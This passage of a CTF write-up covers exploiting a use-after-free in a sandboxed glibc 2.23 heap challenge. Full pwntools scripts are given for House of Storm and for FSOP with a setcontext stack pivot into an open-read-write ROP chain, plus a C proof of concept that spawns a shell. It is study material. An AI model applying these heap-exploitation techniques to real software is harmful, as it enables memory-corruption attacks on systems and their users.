else if ( chunk_list[index] )
{
free((void *)chunk_list[index]); // UAF
puts("delete success.");
}
return __readfsqword(0x28u) ^ v2;
}

Delete module: a UAF, because the pointer is not cleared after free. It also means we can only allocate 8 chunks in total.

unsigned __int64 edit()
{
int index; // [rsp+4h] [rbp-Ch] BYREF, looks like it might overflow
unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);
if ( edit_chance ) // only two edits are allowed
{
puts("which chunk you want to edit?");
scanf("%d", &index);
if ( index < 0 || index > 7 ) // bounds check on index
{
puts("index error.");
}
else if ( chunk_list[index] )
{
puts("content:");
read(0, (void *)chunk_list[index], size_list[index]);
puts("edit success.");
--edit_chance;
}
}
else
{
puts("You can only edit twice.");
}
return __readfsqword(0x28u) ^ v2;
}

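Edit module: index is a signed int, so a negative value can be entered, but the index < 0 || index > 7 check rejects it. The useful primitive here is that a freed chunk can still be edited (at most twice).

Exploitation plan

Constraints imposed by the program:

  • The program runs in a sandbox (execve is blocked), so the only option is ORW
  • The add module restricts size, so only large chunks can be allocated
  • The add module can only be used 8 times
  • The edit and delete modules can each only be used twice

With the UAF, leaking libc_base is easy: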

add(0x410,'aaaa')
add(0x410,'aaaa')
delete(0)
show(0)

p.recvuntil('content:\n')
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))
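The leak arithmetic can be checked on its own without pwntools. In this sketch `libc_base_from_leak` is a hypothetical helper; 0x3c4b78 is the main_arena+88 offset used in the exploit above, and the sample bytes encode the unsortedbin pointer 0x7f2f65fd4b78 that appears in the bin dump later in this writeup.

```python
import struct

MAIN_ARENA_88_OFFSET = 0x3C4B78  # main_arena+88 for this libc-2.23 build (from the exploit)


def libc_base_from_leak(leak: bytes) -> int:
    """Turn the 6 leaked bytes of an unsortedbin fd pointer into libc_base."""
    addr = struct.unpack("<Q", leak[:6].ljust(8, b"\x00"))[0]
    base = addr - MAIN_ARENA_88_OFFSET
    if base & 0xFFF:  # a correct base is page-aligned; anything else means a wrong offset
        raise ValueError("libc base is not page-aligned: %#x" % base)
    return base


sample = bytes.fromhex("784bfd652f7f")  # little-endian 0x7f2f65fd4b78
print(hex(libc_base_from_leak(sample)))
```

The page-alignment check is a cheap sanity test that catches a wrong libc or a wrong offset early.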

Next, let's try House Of Storm (I reworked the leak code a little here):

add(0x428,'aaaa')#0(unsorted)
add(0x428,'aaaa')#1
add(0x418,'aaaa')#2(large)
add(0x418,'aaaa')#3
delete(2)
delete(0)
show(2)

p.recvuntil('content:\n')
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

main_arena=libc_base+3952488
free_hook=libc_base+libc.sym['__free_hook']
success('free_hook >> '+hex(free_hook))

add(0x428,'aaaa')#4(unsorted)
delete(4)

Bin state at this point (pwndbg):

unsortedbin
all: 0x564cc7b72540 —▸ 0x7f2f65fd4b78 (main_arena+88) ◂— 0x564cc7b72540
largebins
0x400: 0x564cc7b72da0 —▸ 0x7f2f65fd4f68 (main_arena+1096) ◂— 0x564cc7b72da0

The next step is to overwrite:

  • unsorted_chunk->BK => fake_chunk
  • large_chunk->BK => fake_chunk+8
  • large_chunk->BK_nextsize => fake_chunk-0x18-5

This uses up exactly the program's two edits:

main_arena1=libc_base+3951480
main_arena2=libc_base+3952488
payload1=p64(main_arena1)+p64(free_hook)
payload2=p64(main_arena2)+p64(free_hook+8)+p64(0)+p64(free_hook-0x18-5)

edit(0,payload1)
edit(2,payload2)

add(0x400,one_gadget)

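I tried to be lazy here and see whether it would work without forging large_chunk->FD_nextsize. It crashed, so I had to leak heap_base properly.

The attack still crashed after that (I could not work out why). I'll park the House Of Storm code here and revisit it once I know the technique better. (The challenge is sandboxed, so one_gadget cannot work anyway, but I did not bother to change it.)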

from pwn import *

p=process('./chall')
libc=ELF('./libc-2.23.so')
elf=ELF('./chall')

#context.log_level = 'debug'

def add(size,content): # 0x410 ~ 0xa9be
    p.sendlineafter('> ',str(1))
    p.sendlineafter('size:\n',str(size))
    p.sendafter('content:\n',content)

def delete(index):
    p.sendlineafter('> ',str(2))
    p.sendlineafter('which chunk you want to delete?\n',str(index))

def edit(index,content):
    p.sendlineafter('> ',str(3))
    p.sendlineafter('which chunk you want to edit?\n',str(index))
    p.sendafter('content:\n',content)

def show(index):
    p.sendlineafter('> ',str(4))
    p.sendlineafter('which chunk you want to show?\n',str(index))

#gdb.attach(p)

add(0x428,'aaaa')#0(unsorted)
add(0x428,'aaaa')#1
add(0x418,'aaaa')#2(large)
add(0x418,'aaaa')#3
delete(2)
delete(0)

show(2)
p.recvuntil('content:\n')
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

main_arena=libc_base+3952488
free_hook=libc_base+libc.sym['__free_hook']
malloc_hook=libc_base+libc.sym['__malloc_hook']
one_gadget_list=[0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget=one_gadget_list[2]+libc_base
success('free_hook >> '+hex(free_hook))
success('malloc_hook >> '+hex(malloc_hook))

show(0)
p.recvuntil('content:\n')
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
heap_base=leak_addr-3488
success('leak_addr >> '+hex(leak_addr))
success('heap_base >> '+hex(heap_base))

add(0x428,'aaaa')#4(unsorted)
delete(4)

main_arena1=libc_base+3951480
main_arena2=libc_base+3952488
heap_addr=heap_base+3488
payload1=p64(main_arena1)+p64(malloc_hook)
payload2=p64(main_arena2)+p64(malloc_hook+8)+p64(heap_addr)+p64(malloc_hook-0x18-5)

edit(0,payload1)
edit(2,payload2)
add(0x410,one_gadget)

p.interactive()

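A senior teammate said this challenge is meant to be solved with FSOP. FSOP happened to be in the IO pwn notes I put together a few days ago, and I had not practiced it on a challenge yet, so this one is a good exercise.

The code below is my first attempt: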

from pwn import *

p=process('./chall')
libc=ELF('./libc-2.23.so')
elf=ELF('./chall')

#context.log_level = 'debug'
context.arch = "amd64"

def add(size,content): # 0x410 ~ 0xa9be
    p.sendlineafter('> ',str(1))
    p.sendlineafter('size:\n',str(size))
    p.sendafter('content:\n',content)

def delete(index):
    p.sendlineafter('> ',str(2))
    p.sendlineafter('which chunk you want to delete?\n',str(index))

def edit(index,content):
    p.sendlineafter('> ',str(3))
    p.sendlineafter('which chunk you want to edit?\n',str(index))
    p.sendafter('content:\n',content)

def show(index):
    p.sendlineafter('> ',str(4))
    p.sendlineafter('which chunk you want to show?\n',str(index))

#gdb.attach(p)
add(0x6b0,'hehehehe')#0
add(0x428,'./flag\x00')#1
delete(0)

show(0)
p.recvuntil('content:\n')
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

main_arena=libc_base+3952488
system_libc=libc_base+libc.sym['system']
free_hook=libc_base+libc.sym['__free_hook']
malloc_hook=libc_base+libc.sym['__malloc_hook']
io_list_all=libc_base+libc.sym['_IO_list_all']
one_gadget_list=[0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget=one_gadget_list[2]+libc_base
success('free_hook >> '+hex(free_hook))
success('malloc_hook >> '+hex(malloc_hook))
success('io_list_all >> '+hex(io_list_all))

add(0x428,'a'*0x10)#2
show(2)

p.recvuntil('content:\n')
p.recvuntil('a'*16)
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
heap_base=leak_addr-1344
success('leak_addr >> '+hex(leak_addr))
success('heap_base >> '+hex(heap_base))

pop_rax_ret=libc_base+0x000000000003a738
pop_rdi_ret=libc_base+0x0000000000021112
pop_rsi_ret=libc_base+0x00000000000202f8
pop_rdx_ret=libc_base+0x0000000000001b92
syscall_ret=libc_base+0x00000000000bc3f5

bss_addr=heap_base+0x18
flag_addr=heap_base+3088

# open(flag_addr,0)
orw = p64(pop_rax_ret) + p64(2)
orw += p64(pop_rdi_ret) + p64(flag_addr)
orw += p64(pop_rsi_ret) + p64(0)
orw += p64(pop_rdx_ret) + p64(0)
orw += p64(syscall_ret)
# read(3,bss_addr,0x60)
orw += p64(pop_rax_ret) + p64(0)
orw += p64(pop_rdi_ret) + p64(3)
orw += p64(pop_rsi_ret) + p64(bss_addr)
orw += p64(pop_rdx_ret) + p64(0x60)
orw += p64(syscall_ret)
# write(1,bss_addr,0x60)
orw += p64(pop_rax_ret) + p64(1)
orw += p64(pop_rdi_ret) + p64(1)
orw += p64(pop_rsi_ret) + p64(bss_addr)
orw += p64(pop_rdx_ret) + p64(0x60)
orw += p64(syscall_ret)

fake_file = '/bin/sh\x00'+p64(0x61)
fake_file += p64(0)+p64(io_list_all-0x10)
fake_file += p64(0) + p64(1)
fake_file = fake_file.ljust(0xc0,'\x00')
fake_file += p64(0) * 3
fake_file += p64(heap_base+1360) # points at orw_addr-24

payload=p64(0)*3 + orw

payload= payload.ljust(0x420-0x10,'\x00')
payload= payload + fake_file

delete(2)
add(0x410,'aaaa')#3

edit(0,payload) # make sure the unsortedbin holds only the target chunk at this point

p.sendlineafter('> ',str(1))
p.sendlineafter('size:\n',str(1040))

p.interactive()

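First, my line of thought:

  • I thought of the FSOP attack from the second half of house of orange and imitated it
  • Use an unsortedbin attack to write main_arena + 88 into io_list_all
  • Use heap feng shui to build a heap overlap and rewrite unsorted chunk->size to 0x61
  • The program then treats the unsorted chunk as a small chunk, and ends up using it as a FILE structure
  • Forge a FILE structure inside the fake small chunk and point its vtable field at the ORW chain

Things to watch out for:

  • Heap feng shui is the key: allocate a big chunk, free it, then allocate from it again (with a smaller size this time); the stale pointer to the big chunk then gives a heap overflow
  • When forging the FILE structure, the unsortedbin must contain only one chunk (the one whose size gets overwritten), otherwise the program crashes
  • Once io_list_all is hijacked, _IO_OVERFLOW from the fake vtable gets executed (see FSOP for details). It can be overwritten with any function we want to run, and that function receives the address of fake small chunk->presize as its first argument (I simply put "/bin/sh" there)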
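The fake FILE described above can be laid out field by field. The sketch below packs the same bytes as the `fake_file` string in the exploit, with the offsets spelled out; `build_fake_file` is a hypothetical helper, and the two sample addresses are taken from the debugger output later in this writeup.

```python
import struct


def p64(value: int) -> bytes:
    return struct.pack("<Q", value)


def build_fake_file(io_list_all: int, vtable_addr: int) -> bytes:
    """Forged chunk that doubles as a FILE structure (glibc 2.23 layout)."""
    f = b"/bin/sh\x00"            # 0x00: prev_size / _flags, also the first argument of the call
    f += p64(0x61)                # 0x08: forged size, so the chunk is sorted into the 0x60 smallbin
    f += p64(0)                   # 0x10: fd
    f += p64(io_list_all - 0x10)  # 0x18: bk, the unsortedbin attack target
    f += p64(0)                   # 0x20: _IO_write_base
    f += p64(1)                   # 0x28: _IO_write_ptr > _IO_write_base
    f = f.ljust(0xC0, b"\x00")    # 0xc0: _mode = 0
    f += p64(0) * 3
    f += p64(vtable_addr)         # 0xd8: vtable
    return f


fake = build_fake_file(0x7F11A54EB520, 0x55B7807E5550)
print(len(fake), fake[:8])
```

The write_ptr > write_base and _mode <= 0 fields are what make _IO_flush_all_lockp decide to call _IO_OVERFLOW on this entry.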

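But this exp has an obvious problem:

  • The ORW chain lives on the heap, and I have no control over the data on the stack (how did I not notice at the time?!)

So setcontext is needed to take control of RSP. First, the code of setcontext: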

.text:0000000000047B40 ; __unwind {
.text:0000000000047B40 push rdi
.text:0000000000047B41 lea rsi, [rdi+128h] ; nset
.text:0000000000047B48 xor edx, edx ; oset
.text:0000000000047B4A mov edi, 2 ; how
.text:0000000000047B4F mov r10d, 8 ; sigsetsize
.text:0000000000047B55 mov eax, 0Eh
.text:0000000000047B5A syscall ; LINUX - sys_rt_sigprocmask
.text:0000000000047B5C pop rdi
.text:0000000000047B5D cmp rax, 0FFFFFFFFFFFFF001h
.text:0000000000047B63 jnb short loc_47BC0
.text:0000000000047B65 mov rcx, [rdi+0E0h]
.text:0000000000047B6C fldenv byte ptr [rcx]
.text:0000000000047B6E ldmxcsr dword ptr [rdi+1C0h]
.text:0000000000047B75 mov rsp, [rdi+0A0h] // target
.text:0000000000047B7C mov rbx, [rdi+80h]
.text:0000000000047B83 mov rbp, [rdi+78h]
.text:0000000000047B87 mov r12, [rdi+48h]
.text:0000000000047B8B mov r13, [rdi+50h]
.text:0000000000047B8F mov r14, [rdi+58h]
.text:0000000000047B93 mov r15, [rdi+60h]
.text:0000000000047B97 mov rcx, [rdi+0A8h]
.text:0000000000047B9E push rcx
.text:0000000000047B9F mov rsi, [rdi+70h]
.text:0000000000047BA3 mov rdx, [rdi+88h]
.text:0000000000047BAA mov rcx, [rdi+98h]
.text:0000000000047BB1 mov r8, [rdi+28h]
.text:0000000000047BB5 mov r9, [rdi+30h]
.text:0000000000047BB9 mov rdi, [rdi+68h]
.text:0000000000047BB9 ; } // starts at 47B40
.text:0000000000047BBD ; __unwind {
.text:0000000000047BBD xor eax, eax
.text:0000000000047BBF retn

Note this instruction:

mov     rsp, [rdi+0A0h]

This function loads rsp from memory addressed through rdi, and rdi is under our control.

But these two instructions also need attention:

.text:0000000000047B97                 mov     rcx, [rdi+0A8h]
.text:0000000000047B9E push rcx

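This push writes rcx just below the new stack top, and the final retn pops it as the return address. It therefore disturbs the ROP chain unless [rdi+0A8h] holds the first gadget (this tripped me up many times).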
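The effect of the `mov rsp` / `push rcx` / `retn` sequence can be traced with a tiny memory model. This is a sketch: `setcontext_pivot` is a hypothetical helper, memory is a plain dict of 8-byte slots, the other register loads are ignored, and the sample values come from the debugger output shown later in this writeup.

```python
def setcontext_pivot(mem: dict, rdi: int):
    """Model: mov rsp,[rdi+0xa0]; mov rcx,[rdi+0xa8]; push rcx; ...; retn."""
    rsp = mem[rdi + 0xA0]
    rcx = mem[rdi + 0xA8]
    rsp -= 8           # push rcx: the slot just below the new rsp is overwritten
    mem[rsp] = rcx
    rip = mem[rsp]     # retn pops the value that was just pushed
    rsp += 8
    return rip, rsp


rdi = 0x55B7807E5960
mem = {
    rdi + 0xA0: 0x55B7807E5578,  # fake rsp = orw_addr + 8
    rdi + 0xA8: 0x7F11A5160738,  # fake rcx = address of the `pop rax` gadget
    0x55B7807E5578: 2,           # value that `pop rax` will consume
}
rip, rsp = setcontext_pivot(mem, rdi)
print(hex(rip), hex(rsp), hex(mem[0x55B7807E5570]))
```

Execution resumes at the gadget stored in [rdi+0xa8], with rsp back at the value stored in [rdi+0xa0]. This is why the exploit sets the fake rsp to orw_addr+8 and the fake rcx to the chain's first gadget.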

Enough talk, here is the code:

from pwn import *

p=process('./chall')
libc=ELF('./libc-2.23.so')
elf=ELF('./chall')

#context.log_level = 'debug'
context.arch = "amd64"

def add(size,content): # 0x410 ~ 0xa9be
    p.sendlineafter('> ',str(1))
    p.sendlineafter('size:\n',str(size))
    p.sendafter('content:\n',content)

def delete(index):
    p.sendlineafter('> ',str(2))
    p.sendlineafter('which chunk you want to delete?\n',str(index))

def edit(index,content):
    p.sendlineafter('> ',str(3))
    p.sendlineafter('which chunk you want to edit?\n',str(index))
    p.sendafter('content:\n',content)

def show(index):
    p.sendlineafter('> ',str(4))
    p.sendlineafter('which chunk you want to show?\n',str(index))

#gdb.attach(p)
add(0x6b0,'hehehehe')#0
add(0x428,'./flag\x00')#1
delete(0)

show(0)
p.recvuntil('content:\n')
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
libc_base=leak_addr-0x3c4b78
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

main_arena=libc_base+3952488
system_libc=libc_base+libc.sym['system']
free_hook=libc_base+libc.sym['__free_hook']
malloc_hook=libc_base+libc.sym['__malloc_hook']
io_list_all=libc_base+libc.sym['_IO_list_all']
setcontext=libc_base+libc.sym['setcontext']
one_gadget_list=[0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget=one_gadget_list[2]+libc_base
success('free_hook >> '+hex(free_hook))
success('malloc_hook >> '+hex(malloc_hook))
success('io_list_all >> '+hex(io_list_all))
success('setcontext >> '+hex(setcontext))

add(0x428,'a'*0x10)#2
show(2)

p.recvuntil('content:\n')
p.recvuntil('a'*16)
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
heap_base=leak_addr-1344
success('leak_addr >> '+hex(leak_addr))
success('heap_base >> '+hex(heap_base))

pop_rax_ret=libc_base+0x000000000003a738
pop_rdi_ret=libc_base+0x0000000000021112
pop_rsi_ret=libc_base+0x00000000000202f8
pop_rdx_ret=libc_base+0x0000000000001b92
syscall_ret=libc_base+0x00000000000bc3f5

bss_addr=heap_base+0x18
flag_addr=heap_base+3088
orw_addr=heap_base+1392

# open(flag_addr,0)
orw = p64(pop_rax_ret) + p64(2)
orw += p64(pop_rdi_ret) + p64(flag_addr)
orw += p64(pop_rsi_ret) + p64(0)
orw += p64(pop_rdx_ret) + p64(0)
orw += p64(syscall_ret)
# read(3,bss_addr,0x60)
orw += p64(pop_rax_ret) + p64(0)
orw += p64(pop_rdi_ret) + p64(3)
orw += p64(pop_rsi_ret) + p64(bss_addr)
orw += p64(pop_rdx_ret) + p64(0x60)
orw += p64(syscall_ret)
# write(1,bss_addr,0x60)
orw += p64(pop_rax_ret) + p64(1)
orw += p64(pop_rdi_ret) + p64(1)
orw += p64(pop_rsi_ret) + p64(bss_addr)
orw += p64(pop_rdx_ret) + p64(0x60)
orw += p64(syscall_ret)

frame_rsp=orw_addr+8
frame_rcx=pop_rax_ret
frame = p64(frame_rsp) #rdi+0xA0
frame += p64(frame_rcx) #rdi+0xA8

fake_file = '/bin/sh\x00'+p64(0x61)
fake_file += p64(0)+p64(io_list_all-0x10)
fake_file += p64(0) + p64(1)
fake_file = fake_file.ljust(0xa0,'\x00')
fake_file += p64(frame_rsp) #rdi+0xA0
fake_file += p64(frame_rcx) #rdi+0xA8
fake_file = fake_file.ljust(0xc0,'\x00')
fake_file += p64(0) * 3
fake_file += p64(heap_base+1360)

payload=p64(0)*3 + p64(setcontext+53) + orw
payload= payload.ljust(0x420-0x10,'\x00')
payload= payload+fake_file

delete(2)
add(0x410,'aaaa')#3
edit(0,payload)

p.sendlineafter('> ',str(1))
p.sendlineafter('size:\n',str(1040))

p.interactive()

A note on how setcontext is used here:

I write setcontext+53 into fake vtable->_IO_OVERFLOW. When it runs, rdi points at the address of fake small chunk->presize, and I have already placed the fake rsp and the fake rcx at rdi+0xa0 and rdi+0xa8:

pwndbg> telescope 0x55b7807e5960
00:0000│ 0x55b7807e5960 ◂— 0x68732f6e69622f /* '/bin/sh' */
01:0008│ 0x55b7807e5968 ◂— 0x61 /* 'a' */
02:0010│ 0x55b7807e5970 ◂— 0x0
03:0018│ 0x55b7807e5978 —▸ 0x7f11a54eb510 ◂— 0x0
04:0020│ 0x55b7807e5980 ◂— 0x0
05:0028│ 0x55b7807e5988 ◂— 0x1
06:0030│ 0x55b7807e5990 ◂— 0x0
07:0038│ 0x55b7807e5998 ◂— 0x0
08:0040│ 0x55b7807e59a0 ◂— 0x0
... ↓ 7 skipped
10:0080│ 0x55b7807e59e0 ◂— 0x0
... ↓ 3 skipped
14:00a0│ 0x55b7807e5a00 —▸ 0x55b7807e5578 ◂— 0x2 // rdi+0xa0
15:00a8│ 0x55b7807e5a08 —▸ 0x7f11a5160738 (mblen+104) ◂— pop rax // rdi+0xa8
16:00b0│ 0x55b7807e5a10 ◂— 0x0
17:00b8│ 0x55b7807e5a18 ◂— 0x0
18:00c0│ 0x55b7807e5a20 ◂— 0x0
... ↓ 2 skipped
1b:00d8│ 0x55b7807e5a38 —▸ 0x55b7807e5550 ◂— 0x0 // fake vtable addr
pwndbg> telescope 0x55b7807e5550 // fake vtable addr
00:0000│ 0x55b7807e5550 ◂— 0x0
... ↓ 2 skipped
03:0018│ 0x55b7807e5568 —▸ 0x7f11a516db85 (setcontext+53) ◂— mov rsp, qword ptr [rdi + 0xa0] // fake vtable -> _IO_OVERFLOW
04:0020│ 0x55b7807e5570 —▸ 0x7f11a5160738 (mblen+104) ◂— pop rax
05:0028│ 0x55b7807e5578 ◂— 0x2
06:0030│ 0x55b7807e5580 —▸ 0x7f11a5147112 (iconv+194) ◂— pop rdi
07:0038│ 0x55b7807e5588 —▸ 0x55b7807e5c10 ◂— 0x67616c662f2e /* './flag' */
08:0040│ 0x55b7807e5590 —▸ 0x7f11a51462f8 (init_cacheinfo+40) ◂— pop rsi
09:0048│ 0x55b7807e5598 ◂— 0x0
0a:0050│ 0x55b7807e55a0 —▸ 0x7f11a5127b92 ◂— pop rdx

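rsp now ends up at the head of the ORW chain, which sits right after the fake vtable -> _IO_OVERFLOW slot, and the flag can be read out.


Summary

This challenge took me a long time, and along the way I learned FSOP, ORW on the heap, and even House Of Storm (although that one did not succeed).

While working on the FSOP part I changed my heap layout a dozen times or more. It was my first FSOP attempt and I had no experience, so everything I did was adapted from the House Of Orange template. That was frustrating, because when it crashed I did not know why and could only imitate blindly. Fortunately the imitation worked in the end.

After the FSOP attack I could call functions in libc but could not get my ORW chain to run. I later realized that the chain was on the heap and that a stack pivot was needed. With help from a senior teammate I learned about setcontext, and after analyzing its code I used it to run the ORW chain.

PS: At first I thought this challenge needed largebin attack knowledge (for example House Of Storm), so I studied that too.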

House Of Storm

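House Of Storm combines the unsortedbin attack and the Largebin attack; its basic principle is similar to the Largebin attack.

House Of Storm can write a chunk address to an arbitrary address and then use the high byte of that address as a size. This lets a chunk be allocated at an arbitrary address, i.e. an arbitrary write. The impact is severe, but the preconditions are strict.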


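House Of Storm: how to use it

House Of Storm preconditions:

  • libc older than libc-2.30 (libc-2.30 added checks)
  • The attacker needs one chunk in the largebin and one in the unsortedbin. Once sorted, both must fall into the same largebin index, and the unsortedbin chunk must be larger than the largebin chunk
  • The bk pointer of the unsortedbin chunk must be controllable
  • The bk and bk_nextsize pointers of the largebin chunk must be controllable

Compared with a plain Largebin attack there is one extra condition: the bk pointer in the unsorted bin must be controllable. But if the Largebin attack conditions hold, the program almost certainly has a UAF, so controlling one more bk pointer should not be hard.

House Of Storm steps:

  • Use the large bin attack to make two misaligned writes, one onto the size and one onto the bk of the fake chunk. The size receives 0x55 or 0x56 (with PIE, heap addresses are always 6 bytes long and start with 0x55 or 0x56; 0x56 is needed, because malloc performs a check afterwards)
  • The check passes if any one of the following holds: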
assert(!victim || chunk_is_mmapped(mem2chunk(victim)) || ar_ptr == arena_for_chunk(mem2chunk(victim)));
/* 1. victim is 0 */
/* 2. IS_MMAPPED is 1 */
/* 3. NON_MAIN_ARENA is 0 */
  • Use the unsorted bin attack to write the address main_arena + 88 into the FD position, which gets past the check
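The difference between 0x55 and 0x56 comes down to the three flag bits in the low end of the size field. The sketch below models the assert for a non-NULL chunk, under the assumption that the allocation is served from main_arena; `passes_malloc_assert` and `chunksize` are hypothetical helper names.

```python
PREV_INUSE, IS_MMAPPED, NON_MAIN_ARENA = 0x1, 0x2, 0x4


def chunksize(size_field: int) -> int:
    """Size with the three flag bits masked off."""
    return size_field & ~0x7


def passes_malloc_assert(size_field: int) -> bool:
    """Conditions 2 and 3 of the assert, for a chunk returned from main_arena."""
    if size_field & IS_MMAPPED:
        return True                            # chunk_is_mmapped() short-circuits the assert
    return not (size_field & NON_MAIN_ARENA)   # otherwise the chunk must belong to main_arena


for size in (0x55, 0x56):
    print(hex(size), bin(size & 0x7), hex(chunksize(size)), passes_malloc_assert(size))
```

Both values describe a 0x50-byte chunk; only 0x56 has IS_MMAPPED set, so only it gets past the assert.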

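At its core House Of Storm also just writes heap addresses, but with a careful setup the attacker can make that heap address act as a size field, and the unsortedbin attack is then built on that size field.

Forged example: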

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
struct {
unsigned long presize;
unsigned long size;
unsigned long fd;
unsigned long bk;
unsigned long fd_nextsize;
unsigned long bk_nextsize;
}chunk;

int main()
{
unsigned long *large_chunk,*unsorted_chunk;
unsigned long *fake_chunk = (unsigned long *)&chunk;
char *ptr;

unsorted_chunk=malloc(0x418);
malloc(0X20);
large_chunk=malloc(0x408);
malloc(0x20);

free(large_chunk);
free(unsorted_chunk);
unsorted_chunk=malloc(0x418); // large_chunk is sorted into the largebin
free(unsorted_chunk); // unsorted_chunk goes back into the unsortedbin

unsorted_chunk[1] = (unsigned long )fake_chunk;
large_chunk[1] = (unsigned long )fake_chunk+8;
large_chunk[3] = (unsigned long )fake_chunk-0x18-5;

ptr=malloc(0x48);
strncpy(ptr, "/bin/sh\x00", 0x10);
system(((char *)fake_chunk + 0x10));

return 0;
}

Running it a few times:

➜  桌面 ./test
[1] 5082 segmentation fault ./test
➜ 桌面 ./test
[1] 5088 segmentation fault ./test
➜ 桌面 ./test
$ whoami
yhellow

Now single-step through it:

  • After the setup steps have run:
unsortedbin
all: 0x55555555a000 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x55555555a000
largebins
0x400: 0x55555555a450 —▸ 0x7ffff7dd1f68 (main_arena+1096) ◂— 0x55555555a450
  • The data in unsorted_chunk and large_chunk:
pwndbg> x/20xg 0x55555555a000 /* unsorted_chunk */
0x55555555a000: 0x0000000000000000 0x0000000000000421
0x55555555a010: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 /* main_arena */
0x55555555a020: 0x0000000000000000 0x0000000000000000
pwndbg> x/20xg 0x55555555a450 /* large_chunk */
0x55555555a450: 0x0000000000000000 0x0000000000000411
0x55555555a460: 0x00007ffff7dd1f68 0x00007ffff7dd1f68 /* main_arena */
0x55555555a470: 0x000055555555a450 0x000055555555a450 /* large_chunk (points to itself) */
0x55555555a480: 0x0000000000000000 0x0000000000000000
  • After the overwrite:
pwndbg> x/20xg 0x55555555a000 /* unsorted_chunk */
0x55555555a000: 0x0000000000000000 0x0000000000000421
0x55555555a010: 0x00007ffff7dd1b78 0x0000555555558040 /* fake_chunk */
0x55555555a020: 0x0000000000000000 0x0000000000000000
pwndbg> x/20xg 0x55555555a450 /* large_chunk */
0x55555555a450: 0x0000000000000000 0x0000000000000411
0x55555555a460: 0x00007ffff7dd1f68 0x0000555555558048 /* fake_chunk+8 */
0x55555555a470: 0x000055555555a450 0x0000555555558023 /* fake_chunk-0x18-5 */
0x55555555a480: 0x0000000000000000 0x0000000000000000

Bins after the overwrite:

unsortedbin
all [corrupted] /* GDB reports the list as corrupted */
FD: 0x55555555a000 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x55555555a000
BK: 0x55555555a000 —▸ 0x555555558040 (chunk) ◂— 0x0 /* fake_chunk */
largebins
0x400 [corrupted]
FD: 0x55555555a450 —▸ 0x7ffff7dd1f68 (main_arena+1096) ◂— 0x55555555a450
BK: 0x55555555a450 —▸ 0x555555558048 (chunk+8) ◂— 0x0
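  • fake_chunk is now linked into the unsortedbin through BK, directly behind unsorted_chunk
  • A normal allocation would be expected to crash, because fake_chunk cannot pass the checks when it is taken from the unsortedbin

Yet the program may run without crashing. Why? The answer is in the source: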

/* fwd => ends up as the chunk ahead of victim (here, the largebin chunk) */
/* bck => ends up as the chunk behind victim */
/* victim => the unsortedbin chunk about to be sorted into the largebin */

/* fwd->bk => fake_chunk+8 */
/* fwd->bk_nextsize => fake_chunk-0x18-5 */

else /* victim becomes the new head of the vertical list */
{
victim->fd_nextsize = fwd;
/* unsorted_chunk->fd_nextsize = large_chunk */
victim->bk_nextsize = fwd->bk_nextsize;
/* unsorted_chunk->bk_nextsize = fake_chunk-0x18-5 */
if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd)) /* check added in glibc 2.30 */
malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
fwd->bk_nextsize = victim;
/* large_chunk->bk_nextsize = unsorted_chunk */
victim->bk_nextsize->fd_nextsize = victim;
/* *((fake_chunk-0x18-5)+0x20) = victim, i.e. victim is written at fake_chunk+3 */
}
bck = fwd->bk;
/* bck = fake_chunk+8 */
if (bck->fd != fwd) /* check added in glibc 2.30 */
malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
}
......
mark_bin (av, victim_index);

victim->bk=bck;
/* unsorted_chunk->bk = fake_chunk+8 */
victim->fd = fwd;
/* unsorted_chunk->fd = large_chunk */
fwd->bk = victim;
/* large_chunk->bk = unsorted_chunk */
bck->fd = victim;
/* *((fake_chunk+8)+0x10) = victim, i.e. victim is written into fake_chunk->bk */

This is exactly what the largebin attack does. The key step is:

    victim->bk_nextsize->fd_nextsize = victim;
/* *((fake_chunk-0x18-5)+0x20) = victim */

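In other words, victim is written at fake_chunk+3 (fd_nextsize sits at offset 0x20 inside a chunk), which is 5 bytes before the size field at fake_chunk+8:

  • With PIE enabled, heap addresses usually start with 0x55 or 0x56 and are always 6 bytes long; skipping the low 5 bytes leaves just the 0x55 (or 0x56)
  • Because the heap address is written 5 bytes before the size field, the byte that lands in the size field is exactly that 0x55 or 0x56

So the size field of the fake_chunk linked into the unsortedbin may be 0x56. Either value gives a chunk size of 0x50, which exactly matches the malloc(0x48) request, but only 0x56 passes the check after malloc, because its IS_MMAPPED bit is set (note: 0x55 has IS_MMAPPED clear and NON_MAIN_ARENA set, so it fails the check).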
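The byte arithmetic of the misaligned write is easy to verify. The sketch below performs the same 8-byte store into a zeroed scratch buffer and reads back the size field; `forged_size_after_write` is a hypothetical helper, and the two heap addresses are samples taken from the bin dumps in this writeup.

```python
import struct

FD_NEXTSIZE_OFFSET = 0x20  # offset of fd_nextsize inside struct malloc_chunk (64-bit)
SIZE_OFFSET = 0x08         # offset of the size field


def forged_size_after_write(victim: int) -> int:
    """Store `victim` through bk_nextsize = fake_chunk-0x18-5 and return fake_chunk's size field."""
    fake_chunk = 0x40                 # position of fake_chunk inside the scratch buffer
    mem = bytearray(0x80)             # zeroed memory around fake_chunk
    bk_nextsize = fake_chunk - 0x18 - 5
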